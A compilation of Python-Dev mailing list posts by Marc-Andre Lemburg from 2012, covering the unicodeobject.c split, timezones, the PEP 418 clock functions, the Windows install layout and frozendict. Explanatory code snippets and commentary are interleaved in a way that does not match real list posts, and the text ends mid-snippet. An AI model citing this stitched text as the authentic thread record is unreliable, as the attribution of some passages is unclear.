-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 13 2012)
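To illustrate the last point, integrity checking with a plain hash needs nothing beyond the standard library. The following is only a minimal sketch: the helper names `file_sha256` and `verify_distribution` are made up for this example and are not part of any PEP or packaging tool, and a hash only detects corruption or tampering if the expected digest itself comes from a trusted channel.

```python
import hashlib


def file_sha256(path, chunk_size=65536):
    """Return the hex SHA-256 digest of the file at `path`, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # iter() with a sentinel keeps reading until read() returns b"".
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_distribution(path, expected_hex):
    """Hypothetical helper: True if the file matches the published digest."""
    return file_sha256(path) == expected_hex.strip().lower()
```

A caller would obtain `expected_hex` from wherever the project publishes its checksums and refuse to install the file if `verify_distribution()` returns False. Signing, if wanted, can then be applied to the file or the checksum list with external tools such as GPG.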
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 25.10.2012 08:42, Nick Coghlan wrote:

Why are any of these codecs here in unicodeobjectland in the first place? Sure, they're needed so that Python can find its own stuff, but in principle *any* codec could be needed. Is it just a heuristic that the codecs needed for 99% of the world are here, and other codecs live in separate modules?

I believe it's a combination of history and whether or not they're needed by the interpreter during the bootstrapping process before the encodings namespace is importable.

They are in unicodeobject.c so that the compilers can inline the code in the various other places where they are used in the Unicode implementation directly as necessary and because the codecs use a lot of functions from the Unicode API (obviously), so the other direction of inlining (Unicode API in codecs) is needed as well.

BTW: When discussing compiler optimizations, please remember that there are more compilers out there than just GCC and also the fact that not everyone is using the latest and greatest version of it. Link time inlining will usually not be as efficient as compile time optimization and we need every bit of performance we can get for Unicode in Python 3.

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 25 2012)
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 25.10.2012 08:42, Nick Coghlan wrote:

unicodeobject.c is too big, and should be restructured to make any natural modularity explicit, and provide an easier path for users that want to understand how the unicode implementation works.

You can also achieve that goal by structuring the code in unicodeobject.c in a more modular way. It is already structured in sections, but there's always room for improvement, of course.

As mentioned before, it is also possible to split out various sections into separate .c or .h files which then get included in the main unicodeobject.c. If that's where consensus is going, I'm with Stephen here in that such a separation should be done in higher level chunks, rather than creating 10 new files.

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 25 2012)
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 25.10.2012 11:18, Maciej Fijalkowski wrote:

On Thu, Oct 25, 2012 at 8:57 AM, M.-A. Lemburg m...@egenix.com wrote:

On 25.10.2012 08:42, Nick Coghlan wrote:

Why are any of these codecs here in unicodeobjectland in the first place? Sure, they're needed so that Python can find its own stuff, but in principle *any* codec could be needed. Is it just a heuristic that the codecs needed for 99% of the world are here, and other codecs live in separate modules?

I believe it's a combination of history and whether or not they're needed by the interpreter during the bootstrapping process before the encodings namespace is importable.

They are in unicodeobject.c so that the compilers can inline the code in the various other places where they are used in the Unicode implementation directly as necessary and because the codecs use a lot of functions from the Unicode API (obviously), so the other direction of inlining (Unicode API in codecs) is needed as well.

I'm sorry to interrupt, but have you actually measured? What effect the lack of said inlining has on *any* benchmark is definitely beyond my ability to guess and I suspect is beyond the ability to guess of anyone else on this list. I challenge you to find a benchmark that is being significantly affected (15%) with the split proposed by Victor. It does not even have to be a real-world one, although that would definitely buy it more credibility.

I think you misunderstood. What I described is the reason for having the base codecs in unicodeobject.c. I think we all agree that inlining has a positive effect on performance. The scale of the effect depends on the compiler and platform used. Victor already mentioned that he'll check the impact of his proposal, so let's wait for that.

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 25 2012)
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 23.10.2012 10:22, Benjamin Peterson wrote:

2012/10/22 Victor Stinner victor.stin...@gmail.com:

Hi, I forked the CPython repository to work on my split unicodeobject.c project: http://hg.python.org/sandbox/split-unicodeobject.c

The result is 10 files (including the existing unicodeobject.c):

     1176 Objects/unicodecharmap.c
     1678 Objects/unicodecodecs.c
     1362 Objects/unicodeformat.c
      253 Objects/unicodeimpl.h
      733 Objects/unicodelegacy.c
     1836 Objects/unicodenew.c
     2777 Objects/unicodeobject.c
     2421 Objects/unicodeoperators.c
     1235 Objects/unicodeoscodecs.c
     1288 Objects/unicodeutfcodecs.c
    14759 total

This is just a proposition (and work in progress). Everything can be changed :-) unicodenew.c is not a good name. Content of this file may be moved somewhere else. Some files may be merged again if the separation is not justified. I don't like the unicode prefix for filenames, I would prefer a new directory.

--

Shorter files are easier to review and maintain. The compilation is faster if only one file is modified.

The MBCS codec requires windows.h. The whole unicodeobject.c includes it just for this codec. With the split, only unicodeoscodecs.c includes this file.

The MBCS codec also needs a winver variable. This variable is defined between the BLOOM filter and the unicode_result_unchanged() function. How can you explain how these things are sorted? Where should I add a new function or variable? With the split, the variable is now defined very close to where it is used. You don't have to scroll 7000 lines to see where it is used.

If you would like to work on a specific function, you don't have to use the search function of your editor to skip thousands of lines. For example, the 18 functions and 2 types related to the charmap codec are now grouped into one unique and short C file.

It was already possible to extend and maintain unicodeobject.c (some people proved it!), but it should now be much simpler with shorter files.
I would like to repeat my opposition to splitting unicodeobject.c. I don't think the benefits of such a split have been well justified, certainly not to the point that the claim about much simpler maintenance is true.

Same feelings here.

If you do go ahead with such a split, please only split the source files and keep the unicodeobject.c file which then includes all the other files. Such a restructuring should not result in compilers no longer being able to optimize code by inlining functions in one of the most important basic types we have in Python 3.

Also note that splitting the file into multiple smaller ones will actually create more maintenance overhead, since patches will likely no longer be easy to merge from 3.3 to 3.4.

BTW: The positive effect of having everything in one file is that you no longer have to figure out which files to look in when trying to find a piece of logic... it's just a ctrl-f or ctrl-s away :-)

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 23 2012)
Re: [Python-Dev] Split unicodeobject.c into subfiles?
Victor Stinner wrote:

Hi, I would like to split the huge unicodeobject.c file into smaller files. It's just the longest C file of CPython: 14,849 lines. I don't know exactly how to split it, but first I would like to know if you would agree with the idea.

Example:

- Objects/unicode/codecs.c
- Objects/unicode/mod_format.c
- Objects/unicode/methods.c
- Objects/unicode/operators.c
- etc.

I don't know if it's better to use a subdirectory, or use a prefix for new files: Objects/unicode_methods.c, Objects/unicode_codecs.c, etc. There is already a Python/codecs.c file for example (same filename).

Better follow the already existing pattern of using unicode as prefix, e.g. unicodectype.c and unicodetype_db.h.

I would like to split the unicodeobject.c because it's hard to navigate in this huge file between all functions, variables, types, macros, etc. It's hard to add new code and to fix bugs. For example, the implementation of str%args takes 1000 lines, 2 types and 10 functions (since my refactor yesterday, in Python 3.3 the main function is 500 lines long :-)).

I only see one argument against such refactoring: it will be harder to backport/forwardport bugfixes.

When making such a change, you have to pay close attention to functions that the compiler can potentially inline. AFAIK, moving such functions into a separate file would prevent such inlining/optimizations, e.g. the str formatter wouldn't be able to inline codec calls if placed in separate .c files.

It may be better to split the file into multiple .h files which then get recombined into the one unicodeobject.c file.

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 05 2012)
Re: [Python-Dev] TZ-aware local time
Just to add my 2 cents to this discussion as someone who's worked with mxDateTime for almost 15 years.

I think we all agree that users of an application want to input date/time data using their local time (which may very well not be the timezone of the system running the application). On output they want to see their timezone as well, for obvious reasons.

Now timezones are by nature not strictly defined, they have changed very often in history and what's worse: there's no way to predict the timezone details for the future. In many places around the world, the government defines the timezone data and they keep on changing the aspects every now and then: support daylight saving time, drop the support, remove timezones for their countries, add new ones, or simply shift to a different time zone. The only timezone data that's more or less defined is historic timezone data, but even there, different sources can give different data.

What does this mean for the application ? An application doesn't care about the timezone of a point in date/time. It just wants a standard way to store the date/time and a reliable way to work with it. The most commonly used standard for this is the UTC standard and so it's become good practice to convert all date/time values in applications to UTC for storage, math and manipulation. Just like with Unicode, the conversion to local time of the user happens at the UI level.

Conversion from input data to UTC is easy, given the available C lib mechanisms (relying on the tz database). Conversion from UTC to local time is more difficult, but can also be done using the tz database. The timezone information of the entered data or the user's locale is usually available either through the environment, a configuration file or a database storing the original data - both on the input and on the output side. There's no need to stick this information onto the basic data types, since the application will already know anyway.
For most use cases, this strategy works out really well. There are some cases, though, where you do need to work with local time instead of UTC. One such case is the definition of relative date/time values, another related one, the definition of repeating date/time values. These are often defined by users in terms of their local time or relative to other timezones they intend to travel to, so in order to convert the definitions back to UTC you have to run part of the calculation in the resp. local time zone. Repeating date/time values also tend to take other data into account such as bank holidays, opening times, etc. There's no end to making this more and more complicated :-)

However, these things are not in the realm of a basic type anymore. They are application specific details. As a result, it's better to provide tools to implement all this, but not try to force design decisions onto the application writer (which will eventually get in the way).

BTW: That's the main reason why I have so far refused to add native timezone support to the mxDateTime data types and instead let the applications decide on what's the best way for their particular use case. mxDateTime does provide extra tools for timezone support, but doesn't get in the way. It has so far worked out really well.

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 06 2012)
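The "store and calculate in UTC, convert at the UI level" strategy described in this message can be sketched with the standard datetime module. This is only an illustration under stated assumptions: the helper names are invented for the example, it does not use mxDateTime, and a fixed UTC+2 offset labelled "CEST" stands in for a real tz database lookup so that the snippet stays self-contained.

```python
from datetime import datetime, timedelta, timezone

# Assumption: a fixed offset replaces a real tz database zone here.
USER_ZONE = timezone(timedelta(hours=2), "CEST")


def parse_user_input(text, user_zone):
    """Interpret the user's local wall-clock input and return it as UTC."""
    local = datetime.strptime(text, "%Y-%m-%d %H:%M").replace(tzinfo=user_zone)
    return local.astimezone(timezone.utc)


def format_for_user(utc_value, user_zone):
    """Convert a stored UTC value back to the user's zone for display."""
    return utc_value.astimezone(user_zone).strftime("%Y-%m-%d %H:%M %Z")


# Input boundary: local time in, UTC stored.
stored = parse_user_input("2012-06-06 14:30", USER_ZONE)

# Storage and arithmetic happen purely in UTC.
later = stored + timedelta(hours=36)

# Output boundary: UTC out, local time shown.
print(format_for_user(later, USER_ZONE))  # prints 2012-06-08 02:30 CEST
```

The zone only appears at the two boundaries, which matches the point that the application already knows it from the environment or its configuration. Repeating events defined in local time are the case where this simple scheme stops being sufficient, as noted above.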
Re: [Python-Dev] [RFC] PEP 418: Add monotonic time, performance counter and process time functions
Victor Stinner wrote:

Hi, Here is a simplified version of the first draft of the PEP 418. The full version can be read online. http://www.python.org/dev/peps/pep-0418/

The implementation of the PEP can be found in this issue: http://bugs.python.org/issue14428

I post a simplified version for readability and to focus on changes introduced by the PEP. Removed sections: Existing Functions, Deprecated Function, Glossary, Hardware clocks, Operating system time functions, System Standby, Links.

Looks good. I'd suggest to also include a tool or API to determine the real resolution of a time function (as opposed to the advertised one). See pybench's clockres.py helper as example. You often find large differences between the advertised resolution and the available one, e.g. while process timers often advertise very good resolution, they are in fact often only updated at very coarse rates.

E.g. compare the results of clockres.py on Linux:

    Clock resolution of various timer implementations:
    time.clock:              1.000us
    time.time:               0.954us
    systimes.processtime:  999.000us

and FreeBSD:

    Clock resolution of various timer implementations:
    time.clock:           7812.500us
    time.time:               1.907us
    systimes.processtime:    1.000us

and Mac OS X:

    Clock resolution of various timer implementations:
    time.clock:              1.000us
    time.time:               0.954us
    systimes.processtime:    1.000us

Regarding changing pybench: pybench has to stay backwards compatible with earlier releases to make it possible to compare timings. You can add support for new timers to pybench, but please leave the existing timers and defaults in place.
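The idea of measuring the real resolution, rather than trusting the advertised one, can be sketched as follows. This is not pybench's clockres.py; it is a rough approximation written for this note, and `observed_resolution` is a name invented here. It spins until the timer value changes and records the smallest step seen, then prints it next to the value reported by `time.get_clock_info()`, the function proposed in the PEP.

```python
import time


def observed_resolution(timer, samples=20):
    """Smallest positive step seen between timer readings, in seconds."""
    smallest = float("inf")
    for _ in range(samples):
        start = timer()
        now = timer()
        # Busy-wait until the clock visibly advances; "<=" also skips
        # readings where a non-monotonic clock stepped backwards.
        while now <= start:
            now = timer()
        smallest = min(smallest, now - start)
    return smallest


if __name__ == "__main__":
    timers = [
        ("time", time.time),
        ("perf_counter", time.perf_counter),
        ("process_time", time.process_time),
    ]
    for name, timer in timers:
        advertised = time.get_clock_info(name).resolution
        measured = observed_resolution(timer)
        print("%-13s advertised %.3fus  observed %.3fus"
              % (name, advertised * 1e6, measured * 1e6))
```

The observed value is an upper bound that includes the cost of calling the timer itself, so it is best read as "no better than this" and compared across platforms rather than taken as an exact figure.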
---

PEP: 418
Title: Add monotonic time, performance counter and process time functions
Version: f2bb3f74298a
Last-Modified: 2012-04-15 17:06:07 +0200 (Sun, 15 Apr 2012)
Author: Cameron Simpson c...@zip.com.au, Jim Jewett jimjjew...@gmail.com, Victor Stinner victor.stin...@gmail.com
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 26-March-2012
Python-Version: 3.3

Abstract
========

This PEP proposes to add ``time.get_clock_info(name)``, ``time.monotonic()``, ``time.perf_counter()`` and ``time.process_time()`` functions to Python 3.3.

Rationale
=========

If a program uses the system time to schedule events or to implement a timeout, it will not run events at the right moment or stop the timeout too early or too late when the system time is set manually or adjusted automatically by NTP. A monotonic clock should be used instead to not be affected by system time updates: ``time.monotonic()``.

To measure the performance of a function, ``time.clock()`` can be used but it is very different on Windows and on Unix. On Windows, ``time.clock()`` includes time elapsed during sleep, whereas it does not on Unix. ``time.clock()`` precision is very good on Windows, but very bad on Unix. The new ``time.perf_counter()`` function should be used instead to always get the most precise performance counter with a portable behaviour (ex: include time spent during sleep).

To measure CPU time, Python does not provide directly a portable function. ``time.clock()`` can be used on Unix, but it has a bad precision. ``resource.getrusage()`` can also be used on Unix, but it requires to get fields of a structure and compute the sum of time spent in kernel space and user space. The new ``time.process_time()`` function acts as a portable counter that always measures CPU time (doesn't include time elapsed during sleep) and has the best available precision.
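The difference between the two proposed counters is easiest to see across a sleep. The sketch below assumes a Python version that already provides the functions named in the PEP; `measure_sleep` is a helper name made up for this illustration.

```python
import time


def measure_sleep(seconds):
    """Return (wall_elapsed, cpu_elapsed) measured around a sleep."""
    wall_start = time.perf_counter()   # includes time spent sleeping
    cpu_start = time.process_time()    # CPU time of this process only
    time.sleep(seconds)
    wall_elapsed = time.perf_counter() - wall_start
    cpu_elapsed = time.process_time() - cpu_start
    return wall_elapsed, cpu_elapsed


if __name__ == "__main__":
    wall, cpu = measure_sleep(0.2)
    print("perf_counter: %.3fs  process_time: %.3fs" % (wall, cpu))
```

The wall-clock figure should come out close to the requested sleep, while the CPU figure stays near zero because a sleeping process consumes almost no CPU time. Exact numbers depend on the platform and system load.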
Each operating system implements clocks and performance counters differently, and it is useful to know exactly which function is used and some properties of the clock like its resolution and its precision. The new ``time.get_clock_info()`` function gives access to all available information of each Python time function.

New functions:

* ``time.monotonic()``: timeout and scheduling, not affected by system clock updates
* ``time.perf_counter()``: benchmarking, most precise clock for short period
* ``time.process_time()``: profiling, CPU time of the process

Users of new functions:

* time.monotonic(): concurrent.futures, multiprocessing, queue, subprocess, telnet and threading modules to implement timeout
* time.perf_counter(): trace and timeit modules, pybench program
* time.process_time(): profile module
* time.get_clock_info(): pybench program to display information about the timer like the precision or the resolution

The ``time.clock()`` function is deprecated because it is not portable: it behaves differently depending on the operating system. ``time.perf_counter()`` or ``time.process_time()`` should be used instead, depending on your requirements. ``time.clock()`` is marked as deprecated but is not planned for removal.

Python functions
================

New Functions
-------------
Re: [Python-Dev] Use QueryPerformanceCounter() for time.monotonic() and/or time.highres()?
Victor Stinner wrote:

You seem to have missed the episode where I explained that caching the last value in order to avoid going backwards doesn't work -- at least not if the cached value is internal to the API implementation.

Yes, and I can't find it by briefly searching my mail. I haven't had the energy to follow every bit of this discussion because it has become completely insane.

I'm trying to complete the PEP, but I didn't add this part yet.

Of course we cannot promise not moving backwards, since there is a 64 bit wraparound some years in the future.

Some years? I computed 584.5 years, so it should not occur in practice. 32-bit wraparound is a common issue which occurs in practice on Windows (49.7 days wraparound), and I propose a workaround in the PEP (already implemented in the related issue).

Here's actual code from production:

    BOOL WINAPI QueryPerformanceCounterCCP( LARGE_INTEGER* li )
    {
        static LARGE_INTEGER last = {0};
        BOOL ok = QueryPerformanceCounter(li);
        if( !ok ) {
            return FALSE;
        }

Did you already see it failing in practice? Python ignores the return value and only uses the counter value.

Even negative delta values of time are usually harmless on the application level. A curiosity, but harmless.

It depends on your usecase. For a scheduler or to implement a timeout, it does matter. For a benchmark, it's not an issue because you usually repeat a test at least 3 times. Most advanced benchmark tools give a confidence factor to check if the benchmark ran fine or not.

I am offering empirical evidence here from hundreds of thousands of computers over six years: For timing and benchmarking, QPC is good enough, and will only be as precise as the hardware and operating system permits, which in practice is good enough.

The PEP contains also different proofs that QPC is not steady, especially on virtual machines.

I'm not sure I understand what you are after here, Victor. For benchmarks it really doesn't matter if one or two runs fail due to the timer having a problem: you just repeat the run and ignore the false results (you have such issues in all empirical studies). You're making things needlessly complicated here.

Regarding the approach to try to cover all timing requirements in a single time.steady() API, I'm not convinced that this is a good approach. Different applications have different needs, so it's better to provide interfaces to what the OS has to offer and let the application decide what's best.

If an application wants to have a monotonic clock, it should use time.monotonic(). If the OS doesn't provide it, you get an AttributeError and revert to some other function, depending on your needs.

Having a time.steady() API make this decision for you is not going to make your application more portable, since the choice will inevitably be wrong in some cases (e.g. going from CLOCK_MONOTONIC to time.time() as fallback).

BTW: You might also want to take a look at the systimes.py module in pybench. We've been through discussions related to benchmark timing in 2006 already and that module summarizes the best practice outcome :-)

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 03 2012)
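The pattern argued for here, where the application rather than the time module chooses the fallback, might look like the sketch below. The names `pick_timeout_clock` and `wait_until` are hypothetical and exist only for this example. Falling back to `time.time()` is exactly the kind of choice that suits some applications and not others, which is why it sits in application code; on current Python versions `time.monotonic()` is always present, so the fallback branch only matters for interpreters or platforms that lack it.

```python
import time


def pick_timeout_clock():
    """Application-level choice of a clock for timeouts."""
    try:
        return time.monotonic, "monotonic"
    except AttributeError:
        # This application accepts a clock that can jump when the
        # system time is adjusted; another one might refuse to run.
        return time.time, "time"


def wait_until(predicate, timeout, poll=0.01):
    """Poll `predicate` until it is true or `timeout` seconds have passed."""
    clock, _name = pick_timeout_clock()
    deadline = clock() + timeout
    while True:
        if predicate():
            return True
        if clock() >= deadline:
            return False
        time.sleep(poll)
```

A scheduler that cannot tolerate backward jumps could instead raise an error in the `except` branch, which a single library-chosen fallback would not allow.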
Re: [Python-Dev] Python install layout and the PATH on win32 (Rationale part 1: Regularizing the layout)
VanL wrote:

As this has been brought up a couple times in this subthread, I figured that I would lay out the rationale here. There are two proposals on the table: 1) Regularize the install layout, and 2) move the python binary to the binaries directory. This email will deal with the first, and a second email will deal with the second.

1) Regularizing the install layout:

One of Python's strengths is its cross-platform appeal. Carefully-written Python programs are frequently portable between operating systems and Python implementations with very few changes. Over the years, substantial effort has been put into maintaining platform parity and providing consistent interfaces to available functionality, even when different underlying implementations are necessary (such as with ntpath and posixpath).

One place where Python is unnecessarily different, however, is in the layout and organization of the Python environment. This is most visible in the name of the directory for binaries on the Windows platform (Scripts) versus the name of the directory for binaries on every other platform (bin), but a full listing of the layouts shows substantial differences in layout and capitalization across platforms. Sometimes the include is capitalized (Include), and sometimes not; and the python version may or may not be included in the path to the standard library.

This may seem like a harmless inconsistency, and if that were all it was, I wouldn't care. (That said, cross-platform consistency is its own good). But it becomes a real pain when combined with tools like virtualenv or the new pyvenv to create cross-platform development environments. In particular, I regularly do development on both Windows and a Mac, and then deploy on Linux. I do this in virtualenvs, so that I have a controlled and regular environment. I keep them in sync using source control.
The problem comes when I have executable scripts that I want to include in my DVCS - I can't have them in the obvious place - the binaries directory - because *the name of the directory changes when you move between platforms.* More concretely, I can't "hg add Scripts/runner.py" in my Windows environment (where it is put in the PATH by virtualenv) and then do a pull on Mac or Linux and have it end up properly in bin/runner.py, which is the correct PATH location for those platforms.

This applies any time there are executable scripts that you want to manage using source control across platforms. Django projects regularly have these, and I suspect we will be seeing more of this with the new project support in virtualenvwrapper.

While a few people have wondered why I would want this -- hopefully answered above -- I have not heard any opposition to this part of the proposal.

This first proposal is just to make the names of the directories match across platforms. There are six keys defined in the installer files (sysconfig.cfg and distutils.command.install): 'stdlib', 'purelib', 'platlib', 'headers', 'scripts', and 'data'.
Currently on Windows, there are two different layouts defined:

    'nt': {
        'stdlib': '{base}/Lib',
        'platstdlib': '{base}/Lib',
        'purelib': '{base}/Lib/site-packages',
        'platlib': '{base}/Lib/site-packages',
        'include': '{base}/Include',
        'platinclude': '{base}/Include',
        'scripts': '{base}/Scripts',
        'data' : '{base}',
    },
    'nt_user': {
        'stdlib': '{userbase}/Python{py_version_nodot}',
        'platstdlib': '{userbase}/Python{py_version_nodot}',
        'purelib': '{userbase}/Python{py_version_nodot}/site-packages',
        'platlib': '{userbase}/Python{py_version_nodot}/site-packages',
        'include': '{userbase}/Python{py_version_nodot}/Include',
        'scripts': '{userbase}/Scripts',
        'data' : '{userbase}',
    },

The proposal is to make all the layouts change to:

    'nt': {
        'stdlib': '{base}/lib',
        'platstdlib': '{base}/lib',
        'purelib': '{base}/lib/site-packages',
        'platlib': '{base}/lib/site-packages',
        'include': '{base}/include',
        'platinclude': '{base}/include',
        'scripts': '{base}/bin',
        'data' : '{base}',
    },

The change here is that 'Scripts' will change to 'bin' and the capitalization will be removed. Also, user installs of Python will have the same internal layout as system installs of Python. This will also, not coincidentally, match the install layout for posix, at least with regard to the 'bin', 'lib', and 'include' directories.

Again, I have not heard *anyone* objecting to this part of the proposal as it is laid out here. (Paul had a concern with the lib directory earlier, but he said he was ok with the above.) Please let me know if you have any problems or concerns with this part 1.

Since userbase will usually be a single directory in the home dir of a user, the above would lose the possibility to support multiple Python versions
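For readers who want to see the layout difference discussed in this message on their own interpreter, the sysconfig module can print the raw path templates per scheme. This is a minimal sketch, assuming a CPython version whose sysconfig defines the 'nt' and 'posix_prefix' schemes; the exact templates vary between Python versions, so no output is shown.

```python
import sysconfig

# expand=False returns the raw templates ('{base}/...') instead of real paths.
nt_layout = sysconfig.get_paths("nt", expand=False)
posix_layout = sysconfig.get_paths("posix_prefix", expand=False)

for key in ("scripts", "include", "purelib"):
    print(key, "| nt:", nt_layout[key], "| posix:", posix_layout[key])

# Tools that need the scripts directory of the running interpreter can ask
# for it rather than hard-coding "Scripts" or "bin".
scripts_dir = sysconfig.get_path("scripts")
print(scripts_dir)
```

Asking sysconfig helps tools locate the directory, but it does not solve the source-control problem described above, since the directory name checked into the repository still differs per platform.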
Re: [Python-Dev] Python install layout and the PATH on win32
Lindberg, Van wrote:

Mark, MAL, Martin, Tarek, Could you comment on this? This is in the context of changing the name of the 'Scripts' directory on Windows to 'bin'. Éric brings up the point (explained more below) that if we make this change, packages made/installed with the new packaging infrastructure and those made/installed with bdist_wininst and the old (frozen) distutils will be inconsistent. The reason why is that the old distutils has a hard-coded dict in distutils.command.install that would point to the old locations. If we were to make this change in sysconfig.cfg, we would probably want to make a corresponding change in the INSTALL_SCHEMES dict in distutils.command.install.

I'm not sure I understand the point in making that change. Could you expand on the advantage of using bin instead of Scripts? Note that distutils just provides defaults for these installation locations. All of them can be overridden using command line arguments to the install command. FWIW: I've dropped support for bdist_wininst in mxSetup.py since bdist_msi provides much better system integration.

More context:

On 3/20/2012 10:41 PM, Éric Araujo wrote:

On 20/03/2012 21:40, VanL wrote:

On Tuesday, March 20, 2012 at 5:07 PM, Paul Moore wrote:

It's worth remembering Éric's point - distutils is frozen and changes are in theory not allowed. This part of the proposal is not possible without an exception to that ruling. Personally, I don't see how making this change could be a problem, but I'm definitely not an expert.

If distutils doesn't change, bdist_wininst installers built using distutils rather than packaging will do the wrong thing with regard to this change. End users won't be able to tell how an installer has been built.

Looking at the code in bdist_wininst, it loops over the keys in the INSTALL_SCHEMES dict to find the correct locations.
If the hard-coded dict were changed, then the installer would 'just work' with the right location - and this matches my experience having made this sort of change. When I change the INSTALL_SCHEMES dict, things get installed according to the new scheme without difficulty using the standard tools. The only time something causes trouble is when it does its own install routine and hard-codes 'Scripts' as the name of the install directory - and I have only seen that in PyPM a couple of versions ago.

Off the top of my head, the developers with the most experience with Windows deployment are Martin v. Löwis, Mark Hammond and Marc-André Lemburg (not sure about the Windows part for MAL, but he maintains a library that extends distutils and has been broken in the past). I think their approval is required for this kind of huge change.

Note the above - this is why I would like your comment.

The point of the distutils freeze (i.e. feature moratorium) is that we just can’t know what complicated things people are doing with undocumented internals, because distutils appeared unmaintained and under-documented for years and people had to work with and around it; since the start of the distutils2 project we can Just Say No™ to improvements and features in distutils. “I don’t see what could possibly go wrong” is a classic line in both horror movies and distutils development <wink>.

Renaming Scripts to bin on Windows would have effects on some tools we know and surely on many tools we don’t know. We don’t want to see again people who use or extend distutils come with torches and pitchforks because internals were changed and we have to revert. So in my opinion, to decide to go ahead with the change we need strong +1s from the developers I named above and an endorsement by Tarek, or if he can’t participate in the discussion, Guido.

As a footnote, distutils is already broken in 3.3.
Now we give users or system administrators the possibility to edit the install schemes at will in sysconfig.cfg, but distutils hard-codes the old scheme. I tend to think it should be fixed, to make the distutils-packaging transition/cohabitation possible.

Any comment? Thanks, Van

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Mar
Re: [Python-Dev] Add a frozendict builtin type
Victor Stinner wrote:

See also the PEP 351.

I read the PEP and the email explaining why it was rejected. Just to be clear: PEP 351 tries to freeze an object, i.e. to convert a mutable or immutable object into an immutable object. My frozendict proposal, by contrast, doesn't convert anything: it just raises a TypeError if you use a mutable key or value. For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError.

I fail to see the use case you're trying to address with this kind of frozendict(). The purpose of frozenset() is to be able to use a set as dictionary key (and to some extent allow for optimizations and safe iteration). Your implementation can be used as dictionary key as well, but why would you want to do that in the first place?

If you're thinking about disallowing changes to the dictionary structure, e.g. in order to safely iterate over its keys or items, freezing the keys is enough. Requiring the value objects not to change is too much of a restriction to make the type useful in practice, IMHO.

-- Marc-Andre Lemburg, eGenix.com (Feb 28 2012)
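The two ideas in this reply, a frozenset used as a dictionary key and a dictionary whose structure is frozen while its values stay mutable, can be tried with standard-library types. This is only a rough sketch: types.MappingProxyType was added to the standard library after this thread and is a read-only view rather than the proposed frozendict, and the names prices, settings and view are made up for illustration.

```python
from types import MappingProxyType

# frozenset is hashable, so it can serve as a dictionary key.
prices = {frozenset({"burger", "cola"}): 7.5}
print(prices[frozenset({"cola", "burger"})])

# A read-only view: keys cannot be added, removed or rebound through it.
settings = {"hosts": ["a.example", "b.example"]}
view = MappingProxyType(settings)

try:
    view["port"] = 8080
    structure_protected = False
except TypeError:
    structure_protected = True

# The value objects themselves are not frozen and can still change.
view["hosts"].append("c.example")
print(structure_protected, settings["hosts"])
```

Note that the underlying dict can still be modified directly by whoever holds a reference to it, so the view protects against accidental changes only.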
Re: [Python-Dev] Add a frozendict builtin type
Steven D'Aprano wrote:

M.-A. Lemburg wrote:

Victor Stinner wrote:

See also the PEP 351.

I read the PEP and the email explaining why it was rejected. Just to be clear: the PEP 351 tries to freeze an object, try to convert a mutable or immutable object to an immutable object. Whereas my frozendict proposition doesn't convert anything: it just raises a TypeError if you use a mutable key or value. For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError.

I fail to see the use case you're trying to address with this kind of frozendict(). The purpose of frozenset() is to be able to use a set as dictionary key (and to some extent allow for optimizations and safe iteration). Your implementation can be used as dictionary key as well, but why would you want to do that in the first place ?

Because you have a mapping, and want to use a dict for speedy, convenient lookups. Sometimes your mapping involves the key being a string, or an int, or a tuple, or a set, and Python makes it easy to use that in a dict. Sometimes the key is itself a mapping, and Python makes it very difficult. Just google on "python frozendict" or "python immutabledict" and you will find that this keeps coming up time and time again, e.g.:

http://www.cs.toronto.edu/~tijmen/programming/immutableDictionaries.html
http://code.activestate.com/recipes/498072-implementing-an-immutable-dictionary/
http://code.activestate.com/recipes/414283-frozen-dictionaries/
http://bob.pythonmac.org/archives/2005/03/04/frozendict/
http://python.6.n6.nabble.com/frozendict-td4377791.html
http://www.velocityreviews.com/forums/t648910-does-python3-offer-a-frozendict.html
http://stackoverflow.com/questions/2703599/what-would-be-a-frozen-dict

Only the first of those links appears to actually discuss reasons for adding a frozendict, but it fails to provide real world use cases and only gives theoretical reasons for why this would be nice to have.
From a practical view, a frozendict would allow thread-safe iteration over a dict and enable more optimizations (e.g. using an optimized lookup function, optimized hash parameters, etc.) to make lookup in static tables more efficient. OTOH, using a frozendict as key in some other dictionary is, well, not a very realistic use case - programmers should think twice before using such a design :-)

If you're thinking about disallowing changes to the dictionary structure, e.g. in order to safely iterate over its keys or items, freezing the keys is enough. Requiring the value objects not to change is too much of a restriction to make the type useful in practice, IMHO.

It's no more of a limitation than the limitation that strings can't change. Frozendicts must freeze the value as well as the key. Consider the toy example, mapping food combinations to calories:

    d = {
        {appetizer = fried fish, main = double burger, drink = cola}: 5000,
        {appetizer = None, main = green salad, drink = tea}: 200,
    }

(syntax is only for illustration purposes)

Clearly the hash has to take the keys and values into account, which means that both the keys and values have to be frozen. (Values may be mutable objects, but then the frozendict can't be hashed -- just like tuples can't be hashed if any item in them is mutable.)

Right, but that doesn't mean you have to require that values are hashable. A frozendict could (and probably should) use the same logic as tuples: if the values are hashable, the frozendict is hashable, otherwise not.

-- Marc-Andre Lemburg, eGenix.com (Feb 28 2012)
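The "same logic as tuples" suggestion can be illustrated with a small read-only mapping whose hash is computed lazily from its items. This is a hypothetical sketch, not the implementation proposed in the thread: the class name FrozenDict and its internals are made up here, and it is built on collections.abc.Mapping purely for brevity.

```python
from collections.abc import Mapping


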